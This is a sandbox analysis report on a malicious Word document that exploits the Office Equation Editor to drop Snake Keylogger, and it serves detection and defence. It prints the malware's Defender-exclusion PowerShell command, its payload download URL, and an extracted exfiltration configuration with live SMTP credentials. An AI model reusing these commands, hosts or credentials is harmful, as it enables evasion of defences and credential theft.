Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Bank Slip 2.doc

Overview

General Information

Sample name:Bank Slip 2.doc
Analysis ID:1465556
MD5:ff06a87dd0550386be1f780d560f1877
SHA1:69e95738ec635520a508f7424a759261e5032cb0
SHA256:511c82313461b74fe24201d13dead6a280311d248062e09a465eb950502d1c18
Tags:doc
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected Snake Keylogger
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Equation Editor Network Connection
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2780 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 1804 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • obie8920193.exe (PID: 3152 cmdline: "C:\Users\user\AppData\Roaming\obie8920193.exe" MD5: DBDACF479A9DD40133701E06E6DC401C)
        • powershell.exe (PID: 3236 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obie8920193.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • obie8920193.exe (PID: 3244 cmdline: "C:\Users\user\AppData\Roaming\obie8920193.exe" MD5: DBDACF479A9DD40133701E06E6DC401C)
    • EQNEDT32.EXE (PID: 3480 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "reservation@artefes.com", "Password": "ArtEfes4765*+", "Host": "mail.artefes.com", "Port": "587", "Version": "5.1"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Bank Slip 2.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x18e86:$obj2: \objdata
  • 0x18e9b:$obj3: \objupdate
  • 0x18e63:$obj4: \objemb

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.864143938.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000007.00000002.864143938.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000007.00000002.864143938.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
      • 0x14771:$a1: get_encryptedPassword
      • 0x14a5d:$a2: get_encryptedUsername
      • 0x1457d:$a3: get_timePasswordChanged
      • 0x14678:$a4: get_passwordField
      • 0x14787:$a5: set_encryptedPassword
      • 0x15d6d:$a7: get_logins
      • 0x15cd0:$a10: KeyLoggerEventArgs
      • 0x15969:$a11: KeyLoggerEventArgsEventHandler
      00000007.00000002.864143938.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
      • 0x17fdc:$x1: $%SMTPDV$
      • 0x18042:$x2: $#TheHashHere%&
      • 0x19621:$x3: %FTPDV$
      • 0x19715:$x4: $%TelegramDv$
      • 0x15969:$x5: KeyLoggerEventArgs
      • 0x15cd0:$x5: KeyLoggerEventArgs
      • 0x19645:$m2: Clipboard Logs ID
      • 0x19865:$m2: Screenshot Logs ID
      • 0x19975:$m2: keystroke Logs ID
      • 0x19c4f:$m3: SnakePW
      • 0x1983d:$m4: \SnakeKeylogger\
      00000005.00000002.366574375.0000000003579000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Click to see the 13 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        5.2.obie8920193.exe.3599d70.8.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          5.2.obie8920193.exe.3599d70.8.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
            5.2.obie8920193.exe.3599d70.8.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
            • 0x12b71:$a1: get_encryptedPassword
            • 0x12e5d:$a2: get_encryptedUsername
            • 0x1297d:$a3: get_timePasswordChanged
            • 0x12a78:$a4: get_passwordField
            • 0x12b87:$a5: set_encryptedPassword
            • 0x1416d:$a7: get_logins
            • 0x140d0:$a10: KeyLoggerEventArgs
            • 0x13d69:$a11: KeyLoggerEventArgsEventHandler
            5.2.obie8920193.exe.3599d70.8.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
            • 0x1a411:$a2: \Comodo\Dragon\User Data\Default\Login Data
            • 0x19643:$a3: \Google\Chrome\User Data\Default\Login Data
            • 0x19a76:$a4: \Orbitum\User Data\Default\Login Data
            • 0x1aab5:$a5: \Kometa\User Data\Default\Login Data
            5.2.obie8920193.exe.3599d70.8.unpackINDICATOR_SUSPICIOUS_EXE_DotNetProcHookDetects executables with potential process hoockingditekSHen
            • 0x13702:$s1: UnHook
            • 0x13709:$s2: SetHook
            • 0x13711:$s3: CallNextHook
            • 0x1371e:$s4: _hook
            Click to see the 28 entries

            Sigma Signatures

            Exploits

            barindex
            Sigma detected: File Dropped By EQNEDT32EXE
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1804, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\FcdBUj68lnCbMtB[1].exe

            System Summary

            barindex
            Sigma detected: Equation Editor Network Connection
            Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 104.21.53.203, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1804, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obie8920193.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obie8920193.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\obie8920193.exe", ParentImage: C:\Users\user\AppData\Roaming\obie8920193.exe, ParentProcessId: 3152, ParentProcessName: obie8920193.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obie8920193.exe", ProcessId: 3236, ProcessName: powershell.exe
            Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
            Source: Process startedAuthor: Jason Lynch: Data: Command: "C:\Users\user\AppData\Roaming\obie8920193.exe", CommandLine: "C:\Users\user\AppData\Roaming\obie8920193.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\obie8920193.exe, NewProcessName: C:\Users\user\AppData\Roaming\obie8920193.exe, OriginalFileName: C:\Users\user\AppData\Roaming\obie8920193.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1804, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\obie8920193.exe", ProcessId: 3152, ProcessName: obie8920193.exe
            Sigma detected: Suspicious Microsoft Office Child Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\obie8920193.exe", CommandLine: "C:\Users\user\AppData\Roaming\obie8920193.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\obie8920193.exe, NewProcessName: C:\Users\user\AppData\Roaming\obie8920193.exe, OriginalFileName: C:\Users\user\AppData\Roaming\obie8920193.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1804, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\obie8920193.exe", ProcessId: 3152, ProcessName: obie8920193.exe
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obie8920193.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obie8920193.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\obie8920193.exe", ParentImage: C:\Users\user\AppData\Roaming\obie8920193.exe, ParentProcessId: 3152, ParentProcessName: obie8920193.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obie8920193.exe", ProcessId: 3236, ProcessName: powershell.exe
            Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
            Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Users\user\AppData\Roaming\obie8920193.exe, QueryName: checkip.dyndns.org
            Sigma detected: Modification of IE Registry Settings
            Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1804, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obie8920193.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obie8920193.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\obie8920193.exe", ParentImage: C:\Users\user\AppData\Roaming\obie8920193.exe, ParentProcessId: 3152, ParentProcessName: obie8920193.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obie8920193.exe", ProcessId: 3236, ProcessName: powershell.exe
            Sigma detected: Office Macro File Creation
            Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 2780, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
            Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3236, TargetFilename: C:\Users\user\AppData\Local\Temp\oygt2vjk.eyq.ps1

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: https://ampol.top/FcdBUj68lnCbMtB.exeAvira URL Cloud: Label: malware
            Source: https://ampol.top/FcdBUj68lnCbMtB.exejAvira URL Cloud: Label: malware
            Source: https://ampol.top/Avira URL Cloud: Label: malware
            Source: https://ampol.top/FcdBUj68lnCbMtB.exettC:Avira URL Cloud: Label: malware
            Found malware configuration
            Source: 00000005.00000002.366574375.0000000003579000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "reservation@artefes.com", "Password": "ArtEfes4765*+", "Host": "mail.artefes.com", "Port": "587", "Version": "5.1"}
            Multi AV Scanner detection for submitted file
            Source: Bank Slip 2.docReversingLabs: Detection: 39%
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\FcdBUj68lnCbMtB[1].exeJoe Sandbox ML: detected

            Location Tracking

            barindex
            Tries to detect the country of the analysis system (by using the IP)
            Source: unknownDNS query: name: reallyfreegeoip.org

            Exploits

            barindex
            Office equation editor establishes network connection
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 104.21.53.203 Port: 443Jump to behavior
            Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\obie8920193.exe
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\obie8920193.exeJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49165 version: TLS 1.0
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: unknownHTTPS traffic detected: 104.21.53.203:443 -> 192.168.2.22:49163 version: TLS 1.2

            Software Vulnerabilities

            barindex
            Document exploit detected (process start blacklist hit)
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 4x nop then jmp 001C289Bh5_2_001C230D
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h7_2_003C5038
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 4x nop then jmp 003C7B81h7_2_003C78C1
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 4x nop then jmp 003C5D07h7_2_003C5B18
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 4x nop then jmp 003C6691h7_2_003C5B18
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 4x nop then jmp 003C8143h7_2_003C7D30
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 4x nop then jmp 003C6A01h7_2_003C6740
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 4x nop then jmp 003C72C1h7_2_003C7000
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 4x nop then jmp 003C8143h7_2_003C8072
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 4x nop then jmp 003C6E61h7_2_003C6BA0
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 4x nop then jmp 003C7721h7_2_003C7460
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 4x nop then jmp 005746F1h7_2_00574448
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 4x nop then jmp 0057ACF1h7_2_0057AA48
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 4x nop then jmp 00579711h7_2_00579468
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 4x nop then jmp 00575CA9h7_2_00575A00
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 4x nop then jmp 00572CE1h7_2_00572A38
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 4x nop then jmp 005712D1h7_2_00571028
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 4x nop then jmp 0057C2D1h7_2_0057C028
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 4x nop then jmp 00571B81h7_2_005718D8
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 4x nop then jmp 0057CC15h7_2_0057C8D8
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 4x nop then jmp 00574FA1h7_2_00574CF8
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 4x nop then jmp 00573591h7_2_005732E8
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 4x nop then jmp 00579B91h7_2_005798E8
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 4x nop then jmp 00573139h7_2_00572E90
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]7_2_00577698
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 4x nop then jmp 00571729h7_2_00571480
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 4x nop then jmp 0057C729h7_2_0057C480
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 4x nop then jmp 00574B49h7_2_005748A0
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 4x nop then jmp 0057B149h7_2_0057AEA0
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 4x nop then jmp 005753F9h7_2_00575150
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 4x nop then jmp 005739E9h7_2_00573740
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 4x nop then jmp 00579FE9h7_2_00579D40
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 4x nop then jmp 00570A21h7_2_00570778
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 4x nop then jmp 0057BA21h7_2_0057B778
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 4x nop then jmp 00571FD9h7_2_00571D30
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 4x nop then jmp 005705C9h7_2_00570320
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 4x nop then jmp 0057B5CAh7_2_0057B320
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 4x nop then jmp 00570E79h7_2_00570BD0
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 4x nop then jmp 0057BE79h7_2_0057BBD0
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 4x nop then jmp 00574299h7_2_00573FF0
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 4x nop then jmp 0057A899h7_2_0057A5F0
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 4x nop then jmp 00572889h7_2_005725E0
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 4x nop then jmp 00573E41h7_2_00573B98
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 4x nop then jmp 0057A441h7_2_0057A198
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 4x nop then jmp 00572431h7_2_00572188
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]7_2_005779AE
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 4x nop then jmp 00575851h7_2_005755A8
            Source: global trafficDNS query: name: ampol.top
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: reallyfreegeoip.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: reallyfreegeoip.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: reallyfreegeoip.org
            Source: global trafficDNS query: name: reallyfreegeoip.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: reallyfreegeoip.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: reallyfreegeoip.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: reallyfreegeoip.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: reallyfreegeoip.org
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 158.101.44.242:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 158.101.44.242:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 158.101.44.242:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 193.122.6.168:80
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 193.122.130.0:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 158.101.44.242:80
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 158.101.44.242:80
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 193.122.130.0:80
            Source: global trafficTCP traffic: 192.168.2.22:49177 -> 193.122.130.0:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
